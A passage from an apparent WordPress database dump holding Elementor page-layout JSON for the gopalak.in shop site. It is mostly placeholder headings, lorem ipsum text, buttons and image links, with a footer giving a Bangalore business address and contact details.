Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8424,1477,'_elementor_page_assets','a:0:{}'),(8426,1478,'_elementor_edit_mode','builder'),(8427,1478,'_elementor_template_type','wp-page'),(8428,1478,'_elementor_version','3.7.7'),(8429,1478,'_wp_page_template','elementor_canvas'),(8430,1478,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 